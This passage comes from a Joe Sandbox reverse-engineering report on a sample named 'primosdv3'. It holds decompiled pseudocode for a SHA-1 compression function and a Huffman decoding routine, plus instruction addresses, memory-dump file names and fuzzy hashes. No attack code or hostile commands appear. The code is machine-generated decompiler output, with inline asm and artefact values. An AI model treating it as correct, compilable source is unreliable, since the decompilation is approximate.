				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t434;
				intOrPtr _t436;
				intOrPtr _t441;
				void* _t446;
				intOrPtr _t448;
				signed int _t451;
				void* _t453;
				signed int _t459;
				signed int _t465;
				signed int _t471;
				signed int _t478;
				signed int _t481;
				signed int _t488;
				signed int _t511;
				signed int _t518;
				signed int _t525;
				signed int _t545;
				signed int _t554;
				signed int _t563;
				signed int* _t591;
				signed int _t592;
				signed int _t596;
				signed int _t599;
				signed int _t600;
				signed int* _t601;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed int* _t608;
				signed int _t609;
				signed int* _t675;
				signed int* _t746;
				signed int _t757;
				signed int _t774;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t787;
				signed int _t788;
				signed int _t792;
				signed int _t797;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int* _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t826;
				signed int _t831;
				signed int _t835;
				signed int _t839;
				signed int* _t840;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int* _t850;
				signed int _t853;
				signed int _t857;
				signed int _t858;
				signed int* _t862;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed int _t870;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t887;
				signed int _t888;
				signed int* _t889;
				signed int _t890;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int _t899;
				signed int _t900;
				signed int _t902;
				signed int _t903;
				signed int* _t904;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				signed int _t910;
				signed int _t911;

				_t912 =  &_v40;
				if(_a16 == 0) {
					_t840 = _a8;
					_v20 = _t840;
					E00C80320(_t840, _a12, 0x40);
					_t912 =  &(( &_v40)[3]);
				} else {
					_t840 = _a12;
					_v20 = _t840;
				}
				_t850 = _a4;
				_t592 = _t850[1];
				_t894 =  *_t850;
				_v28 = _t850[2];
				_v24 = _t850[3];
				_v32 = _t592;
				_v36 = 0;
				_t434 = E00C868E4( *_t840);
				asm("rol edx, 0x5");
				 *_t840 = _t434;
				_t435 = _t840;
				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
				_v16 = _t840;
				_t853 = _v32;
				asm("ror esi, 0x2");
				_v32 =  &(_t840[3]);
				do {
					_t436 = E00C868E4(_t435[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t436;
					asm("ror ebp, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
					_t441 = E00C868E4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t441;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
					_t446 = E00C868E4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t446;
					asm("ror dword [esp+0x2c], 0x2");
					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
					_t448 = E00C868E4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t448;
					_t451 = _v36 + 5;
					asm("ror dword [esp+0x2c], 0x2");
					_v36 = _t451;
					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
					_v16 =  &(_t840[_t451]);
					_t453 = E00C868E4(_t840[_t451]);
					_t912 =  &(_t912[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t453;
					_t435 = _v16;
					asm("ror esi, 0x2");
					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
				} while (_v36 != 0xf);
				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
				_v32 = _t853;
				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
				asm("rol ecx, 0x5");
				asm("rol esi, 1");
				asm("rol edx, 1");
				asm("ror ebp, 0x2");
				_t840[1] = _t774;
				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
				 *_t840 = _t857;
				_v40 = _t459;
				asm("rol ecx, 0x5");
				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
				_v36 = _t465;
				asm("ror ebx, 0x2");
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror dword [esp+0x10], 0x2");
				_t840[2] = _t778;
				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
				_v32 = _t471;
				asm("rol ecx, 0x5");
				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
				_t858 = _v40;
				asm("rol edx, 1");
				_t840[3] = _t782;
				_v24 = _t596;
				asm("ror dword [esp+0x18], 0x2");
				_t783 = 0x11;
				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
				_v16 = _t783;
				do {
					_t96 = _t783 + 5; // 0x16
					_t478 = _t96;
					_t97 = _t783 - 5; // 0xc
					_v8 = _t478;
					_t99 = _t783 + 3; // 0x14
					_t896 = _t99 & 0x0000000f;
					_v12 = _t896;
					_t599 = _t478 & 0x0000000f;
					asm("rol ecx, 0x5");
					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
					_t481 = _v16;
					asm("rol edx, 1");
					_t840[_t896] = _t787;
					_t897 = _v32;
					asm("ror ebp, 0x2");
					_v32 = _t897;
					_t862 = _v20;
					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
					_t788 = 0xf;
					_t899 = _t481 + 0x00000004 & _t788;
					_t842 = _t481 + 0x00000006 & _t788;
					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
					asm("rol edx, 1");
					 *(_t862 + _t899 * 4) = _t792;
					_t863 = _v28;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v28 = _t863;
					_t488 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
					_t865 = _t488 + 0x00000007 & 0x0000000f;
					_t675 = _v20;
					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
					asm("rol edx, 1");
					 *(_t675 + _t599 * 4) = _t797;
					_t600 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t600;
					_t601 = _v20;
					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
					asm("rol ecx, 0x5");
					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t601 + _t842 * 4) = _t801;
					_t602 = _v24;
					_t843 = _v40;
					asm("ror edi, 0x2");
					_v40 = _t843;
					_t840 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
					_t900 = _v36;
					asm("rol edx, 1");
					asm("rol ecx, 0x5");
					_t840[_t865] = _t805;
					_t858 = _v40;
					_t783 = _v8;
					asm("ror ebp, 0x2");
					_v36 = _t900;
					_v16 = _t783;
					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
				} while (_t783 + 3 <= 0x23);
				_t866 = 0x25;
				_v16 = _t866;
				while(1) {
					_t205 = _t866 + 5; // 0x2a
					_t511 = _t205;
					_t206 = _t866 - 5; // 0x20
					_v4 = _t511;
					_t208 = _t866 + 3; // 0x28
					_t807 = _t208 & 0x0000000f;
					_v8 = _t807;
					_t902 = _t511 & 0x0000000f;
					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
					asm("rol esi, 1");
					_t840[_t807] = _t870;
					asm("ror dword [esp+0x1c], 0x2");
					asm("rol edx, 0x5");
					_t871 = 0xf;
					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
					_t518 = _v16;
					_t604 = _t518 + 0x00000006 & _t871;
					_t810 = _t518 + 0x00000004 & _t871;
					_v12 = _t810;
					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
					asm("rol esi, 1");
					_t840[_t810] = _t875;
					_t844 = _v28;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v28 = _t844;
					_t812 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
					_t525 = _v16;
					_t846 = _t525 + 0x00000007 & 0x0000000f;
					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
					asm("rol esi, 1");
					 *(_t812 + _t902 * 4) = _t879;
					asm("rol edx, 0x5");
					_t903 = _v24;
					asm("ror ebp, 0x2");
					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
					_v24 = _t903;
					_t904 = _v20;
					_v36 = _t815;
					asm("rol edx, 0x5");
					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t604 * 4) = _t883;
					_t602 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
					_v32 = _t816;
					asm("rol edx, 0x5");
					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t846 * 4) = _t887;
					_t905 = _v36;
					asm("ror ebp, 0x2");
					_v36 = _t905;
					_t309 = _t816 - 0x70e44324; // -4294967294
					_t866 = _v4;
					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
					_v16 = _t866;
					if(_t866 + 3 > 0x37) {
						break;
					}
					_t840 = _v20;
				}
				_t817 = 0x39;
				_v16 = _t817;
				_t847 = _t602;
				do {
					_t315 = _t817 + 5; // 0x3e
					_t545 = _t315;
					_v8 = _t545;
					_t317 = _t817 + 3; // 0x3c
					_t318 = _t817 - 5; // 0x34
					_t888 = 0xf;
					_t907 = _t317 & _t888;
					_t606 = _t545 & _t888;
					_t889 = _v20;
					_v4 = _t907;
					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t907 * 4) = _t821;
					_t908 = _v32;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v32 = _t908;
					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
					_t554 = _v16;
					_t822 = 0xf;
					_t849 = _t554 + 0x00000006 & _t822;
					_t910 = _t554 + 0x00000004 & _t822;
					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t910 * 4) = _t826;
					_t890 = _v28;
					asm("rol ecx, 0x5");
					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
					_t563 = _v16;
					asm("ror esi, 0x2");
					_v28 = _t890;
					_t892 = _t563 + 0x00000007 & 0x0000000f;
					_t746 = _v20;
					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t746 + _t606 * 4) = _t831;
					_t607 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t607;
					_t608 = _v20;
					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
					asm("rol edx, 1");
					_t608[_t849] = _t835;
					_t847 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
					_t911 = _v36;
					asm("rol edx, 1");
					_t608[_t892] = _t839;
					_t609 = _v40;
					_t893 = _v32;
					asm("ror ebp, 0x2");
					_t817 = _v8;
					asm("rol ecx, 0x5");
					_v36 = _t911;
					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
					_v16 = _t817;
					_v28 = _t757;
				} while (_t817 + 3 <= 0x4b);
				_t591 = _a4;
				_t591[1] = _t591[1] + _t893;
				_t591[2] = _t591[2] + _t911;
				_t591[3] = _t591[3] + _t609;
				 *_t591 =  *_t591 + _t757;
				_t591[4] = _t591[4] + _t847;
				return _t591;
			}

0x00c6f461
0x00c6f46d
0x00c6f479
0x00c6f483
0x00c6f488
0x00c6f48d
0x00c6f46f
0x00c6f46f
0x00c6f473
0x00c6f473
0x00c6f490
0x00c6f499
0x00c6f49c
0x00c6f49e
0x00c6f4a8
0x00c6f4ae
0x00c6f4b2
0x00c6f4b6
0x00c6f4ce
0x00c6f4da
0x00c6f4de
0x00c6f4e0
0x00c6f4e2
0x00c6f4e6
0x00c6f4ea
0x00c6f4ed
0x00c6f4f1
0x00c6f4f4
0x00c6f4ff
0x00c6f504
0x00c6f51e
0x00c6f523
0x00c6f52e
0x00c6f53b
0x00c6f540
0x00c6f554
0x00c6f55b
0x00c6f565
0x00c6f572
0x00c6f57b
0x00c6f58b
0x00c6f597
0x00c6f599
0x00c6f5a4
0x00c6f5a9
0x00c6f5ac
0x00c6f5c0
0x00c6f5c7
0x00c6f5ce
0x00c6f5d7
0x00c6f5db
0x00c6f5df
0x00c6f5ea
0x00c6f5ed
0x00c6f5f0
0x00c6f5fc
0x00c6f60e
0x00c6f611
0x00c6f613
0x00c6f62d
0x00c6f630
0x00c6f646
0x00c6f649
0x00c6f64c
0x00c6f650
0x00c6f654
0x00c6f661
0x00c6f664
0x00c6f666
0x00c6f668
0x00c6f674
0x00c6f694
0x00c6f697
0x00c6f699
0x00c6f69f
0x00c6f6a2
0x00c6f6a8
0x00c6f6b1
0x00c6f6ba
0x00c6f6cd
0x00c6f6d1
0x00c6f6d7
0x00c6f6da
0x00c6f6df
0x00c6f6eb
0x00c6f6f5
0x00c6f6fa
0x00c6f702
0x00c6f707
0x00c6f708
0x00c6f70c
0x00c6f710
0x00c6f714
0x00c6f714
0x00c6f717
0x00c6f71a
0x00c6f721
0x00c6f726
0x00c6f72b
0x00c6f732
0x00c6f73c
0x00c6f745
0x00c6f748
0x00c6f74c
0x00c6f750
0x00c6f753
0x00c6f75b
0x00c6f76b
0x00c6f774
0x00c6f778
0x00c6f781
0x00c6f784
0x00c6f786
0x00c6f798
0x00c6f7a3
0x00c6f7a5
0x00c6f7a8
0x00c6f7ae
0x00c6f7b3
0x00c6f7c6
0x00c6f7cc
0x00c6f7d0
0x00c6f7e0
0x00c6f7e9
0x00c6f7f3
0x00c6f7f6
0x00c6f7f8
0x00c6f7ff
0x00c6f805
0x00c6f814
0x00c6f821
0x00c6f827
0x00c6f82f
0x00c6f850
0x00c6f853
0x00c6f856
0x00c6f85a
0x00c6f85d
0x00c6f863
0x00c6f86f
0x00c6f87c
0x00c6f880
0x00c6f88a
0x00c6f8a3
0x00c6f8aa
0x00c6f8ae
0x00c6f8b0
0x00c6f8b3
0x00c6f8b8
0x00c6f8be
0x00c6f8c6
0x00c6f8d3
0x00c6f8d9
0x00c6f8e0
0x00c6f8e4
0x00c6f8ef
0x00c6f8f0
0x00c6f8fa
0x00c6f8fa
0x00c6f8fa
0x00c6f8fd
0x00c6f900
0x00c6f907
0x00c6f90c
0x00c6f911
0x00c6f918
0x00c6f926
0x00c6f93d
0x00c6f93f
0x00c6f94a
0x00c6f94f
0x00c6f952
0x00c6f95b
0x00c6f95f
0x00c6f966
0x00c6f96b
0x00c6f972
0x00c6f982
0x00c6f98b
0x00c6f98d
0x00c6f990
0x00c6f9a4
0x00c6f9ab
0x00c6f9ae
0x00c6f9b8
0x00c6f9be
0x00c6f9c2
0x00c6f9d2
0x00c6f9e1
0x00c6f9e4
0x00c6f9e6
0x00c6f9ed
0x00c6f9f0
0x00c6fa0c
0x00c6fa19
0x00c6fa1b
0x00c6fa1f
0x00c6fa26
0x00c6fa2d
0x00c6fa46
0x00c6fa4a
0x00c6fa4c
0x00c6fa50
0x00c6fa64
0x00c6fa7b
0x00c6fa80
0x00c6fa87
0x00c6fa9e
0x00c6faa8
0x00c6faaa
0x00c6faae
0x00c6faba
0x00c6fabf
0x00c6fac7
0x00c6facd
0x00c6fad3
0x00c6fad7
0x00c6fae1
0x00000000
0x00000000
0x00c6f8f6
0x00c6f8f6
0x00c6fae9
0x00c6faea
0x00c6faee
0x00c6faf0
0x00c6faf0
0x00c6faf0
0x00c6faf5
0x00c6faf9
0x00c6fafe
0x00c6fb03
0x00c6fb08
0x00c6fb0a
0x00c6fb0c
0x00c6fb10
0x00c6fb1f
0x00c6fb2e
0x00c6fb30
0x00c6fb33
0x00c6fb3b
0x00c6fb40
0x00c6fb49
0x00c6fb4f
0x00c6fb53
0x00c6fb57
0x00c6fb5e
0x00c6fb60
0x00c6fb73
0x00c6fb82
0x00c6fb84
0x00c6fb87
0x00c6fb8f
0x00c6fba2
0x00c6fba6
0x00c6fbaa
0x00c6fbad
0x00c6fbbd
0x00c6fbc6
0x00c6fbd0
0x00c6fbd3
0x00c6fbd5
0x00c6fbdc
0x00c6fbe0
0x00c6fbf5
0x00c6fbfe
0x00c6fc02
0x00c6fc06
0x00c6fc28
0x00c6fc34
0x00c6fc37
0x00c6fc39
0x00c6fc3c
0x00c6fc4a
0x00c6fc57
0x00c6fc74
0x00c6fc77
0x00c6fc7b
0x00c6fc7d
0x00c6fc80
0x00c6fc86
0x00c6fc8e
0x00c6fc97
0x00c6fc9b
0x00c6fca4
0x00c6fca8
0x00c6fcaa
0x00c6fcb1
0x00c6fcb5
0x00c6fcbe
0x00c6fcc2
0x00c6fcc5
0x00c6fcc8
0x00c6fccb
0x00c6fccd
0x00c6fcd7

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: a8dee219906e28c6b44ca430d8d6cc3776824ca1baf4ce9628ca18a6643be357
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 7A524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00C77153 Relevance: .5, Instructions: 536
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00C77153(signed int __ecx) {
				void* __ebp;
				void* _t220;
				signed int* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t233;
				signed int _t234;
				signed short _t235;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				unsigned int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed short _t276;
				signed int _t277;
				signed int _t281;
				signed int _t282;
				unsigned int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed short _t293;
				unsigned int _t298;
				signed int _t303;
				unsigned int _t305;
				signed int _t310;
				signed short _t311;
				signed int _t316;
				intOrPtr* _t321;
				signed int* _t322;
				unsigned int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				void* _t349;
				signed int _t352;
				signed int _t353;
				unsigned int _t356;
				signed int _t357;
				void* _t358;
				signed int _t361;
				signed int _t362;
				void* _t365;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t372;
				signed int* _t376;
				signed int _t379;
				unsigned int _t382;
				signed int _t383;
				void* _t384;
				signed int _t387;
				void* _t390;
				unsigned int _t393;
				signed int _t394;
				unsigned int _t397;
				void* _t399;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				void* _t411;
				signed int _t415;
				signed int _t416;
				intOrPtr* _t418;
				void* _t419;
				void* _t422;
				signed int _t425;
				intOrPtr* _t429;
				void* _t430;
				signed int* _t436;
				unsigned int _t438;
				unsigned int _t442;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				unsigned int _t451;
				unsigned int _t455;
				signed int _t458;
				unsigned int _t459;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int* _t465;
				signed char _t466;
				signed int* _t468;
				signed int* _t470;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				void* _t479;

				_t466 =  *(_t479 + 0x44);
				 *(_t479 + 0x30) = __ecx;
				_t321 = _t466 + 0x18;
				_t465 = _t466 + 4;
				if( *((char*)(_t466 + 0x2c)) != 0) {
					L2:
					_t344 =  *_t321;
					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
					if( *_t465 <= _t220) {
						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
						 *(_t479 + 0x1c) = _t223;
						 *(_t479 + 0x18) = _t436;
						__eflags = _t223 - _t436;
						if(_t223 >= _t436) {
							_t468 = _t436;
							 *(_t479 + 0x14) = _t436;
						} else {
							_t468 = _t223;
							 *(_t479 + 0x14) = _t468;
						}
						_t322 = _t466 + 0x4ad4;
						while(1) {
							_t345 =  *_t465;
							 *(_t479 + 0x10) = _t322;
							__eflags = _t345 - _t468;
							if(_t345 < _t468) {
								goto L15;
							}
							__eflags = _t345 - _t223;
							if(__eflags > 0) {
								L93:
								return _t223;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t345 - _t436;
								if(_t345 < _t436) {
									L14:
									_t223 = _t466 + 0x4ad4;
									_t322 = _t223;
									 *(_t479 + 0x10) = _t223;
									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
										L92:
										 *((char*)(_t466 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t466 + 0x4ad2));
								if( *((char*)(_t466 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t223 =  *(_t466 + 8);
							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t346 =  *(_t466 + 0x4adc);
							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
							if( *(_t466 + 0x4ad8) > _t346 - 8) {
								_t316 = _t346 + _t346;
								 *(_t466 + 0x4adc) = _t316;
								_push(_t316 * 0xc);
								_push( *_t322);
								_t477 = E00C83E3E(_t346, _t436);
								__eflags = _t477;
								if(_t477 == 0) {
									E00C66CA7(0xca1098);
								}
								 *_t322 = _t477;
							}
							_t225 =  *(_t466 + 0x4ad8);
							_t470 = _t225 * 0xc +  *_t322;
							 *(_t479 + 0x2c) = _t470;
							 *(_t466 + 0x4ad8) = _t225 + 1;
							_t227 = E00C6A89D(_t465);
							_t228 =  *(_t466 + 0xb4);
							_t438 = _t227 & 0x0000fffe;
							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
								_t348 = 0xf;
								_t229 = _t228 + 1;
								 *(_t479 + 0x28) = _t348;
								__eflags = _t229 - _t348;
								if(_t229 >= _t348) {
									L27:
									_t324 = _t465[1] + _t348;
									_t325 = _t324 & 0x00000007;
									 *_t465 =  *_t465 + (_t324 >> 3);
									 *(_t479 + 0x18) =  *_t465;
									_t233 =  *(_t479 + 0x28);
									_t465[1] = _t325;
									_t349 = 0x10;
									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
									asm("sbb eax, eax");
									_t234 = _t233 & _t352;
									__eflags = _t234;
									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
									goto L28;
								}
								_t429 = _t466 + 0x34 + _t229 * 4;
								while(1) {
									__eflags = _t438 -  *_t429;
									if(_t438 <  *_t429) {
										break;
									}
									_t229 = _t229 + 1;
									_t429 = _t429 + 4;
									__eflags = _t229 - 0xf;
									if(_t229 < 0xf) {
										continue;
									}
									_t348 =  *(_t479 + 0x28);
									goto L27;
								}
								_t348 = _t229;
								 *(_t479 + 0x28) = _t229;
								goto L27;
							} else {
								_t430 = 0x10;
								_t464 = _t438 >> _t430 - _t228;
								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
								 *_t465 =  *_t465 + (_t342 >> 3);
								_t325 = _t342 & 0x00000007;
								 *(_t479 + 0x18) =  *_t465;
								_t465[1] = _t325;
								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
								L28:
								_t353 = _t235 & 0x0000ffff;
								__eflags = _t353 - 0x100;
								if(_t353 >= 0x100) {
									__eflags = _t353 - 0x106;
									if(_t353 < 0x106) {
										__eflags = _t353 - 0x100;
										if(_t353 != 0x100) {
											__eflags = _t353 - 0x101;
											if(_t353 != 0x101) {
												_t237 = 3;
												 *_t470 = _t237;
												_t470[2] = _t353 - 0x102;
												_t239 = E00C6A89D(_t465);
												_t240 =  *(_t466 + 0x2d78);
												_t442 = _t239 & 0x0000fffe;
												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
													_t326 = 0xf;
													_t241 = _t240 + 1;
													__eflags = _t241 - _t326;
													if(_t241 >= _t326) {
														L86:
														_t356 = _t465[1] + _t326;
														_t357 = _t356 & 0x00000007;
														_t465[1] = _t357;
